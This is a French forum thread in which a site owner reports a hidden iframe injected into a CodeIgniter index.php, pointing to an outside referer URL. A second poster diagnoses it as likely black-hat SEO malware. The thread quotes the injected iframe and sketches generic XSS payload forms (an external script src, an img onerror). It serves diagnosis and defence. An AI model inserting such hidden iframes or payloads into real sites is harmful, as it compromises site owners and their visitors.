Discussion :

[Aspic]

Bonjour,

Déjà désolé mais je ne sais pas du tout ou poster ce genre de topic

Sur mon framework Codeigniter, j'ai l'impression qu'une injection de code a été faite sur un seul fichier index.php à la racine :

<iframe style="visibility: hidden; display: none; display: none;" src="http://dartmouthcrusaders.org/referer.php?id={DF5674DB-D85C-4ED0-8055-3CB0ABD596EF}"></iframe>

J'ai regardé sur le net mais aucune information sur le site en question.
J'ai bien un antivirus qui n'a rien dit... et quand je vais sur le site en question (je suis fou je sais), le site a l'air normal et avast ne dit rien.

Je voulais savoir si quelqu'un avait plus d'informations sur ce code bizarre ?

Merci beaucoup.

[laurentg2003]

Bonjour,
Si une solution t'interresse encore vu la date du post...
Je ne pense pas qu'il puisse s'agir d'une veritable attaque XSS persistante vu que l'iframe pointe vers un domaine différent et une vrai attaque XSS serait
<script src=monattaque.com/attaque.js></script> ou <img src=xxx.jpg onerror=code js pour generer une insertion de script> et là on est dans le même domaine.
De plus as tu une possibilité sur ton site un livre d'or (avec du bb code mauvais)etc etc voir un compte admin qui une fois forcé autorise d'insérer du code HTML pour insérer une banniere de pub par exemple?
Ton frameword est visiblement sécurisé contre les xss mais j'ai vu des framework trés connus en javascript avoir des failles ....
ça fait penser à un script de pub via une barre d'outil ajouté
Visiblement la variable referer et sa valeur (je ne crois pas que c du code js encodé en hexa etc) sont faite pour voir que c'est ton site
Je pense qu'il s'agit d'un maleware ayant pour but qu'un maximum de liens pointent vers le site en question des methodes de black hat pour optimiser le referencement(en depit de Pingouin...)

D'ailleurs regarde ça...
http://evuln.com/tools/malware-scann...ungwindow.com/ et ça
http://www.anti-webscam.com/www-dart...am_report.html
Maintenant tu dois trouver comment ils injectent le code ....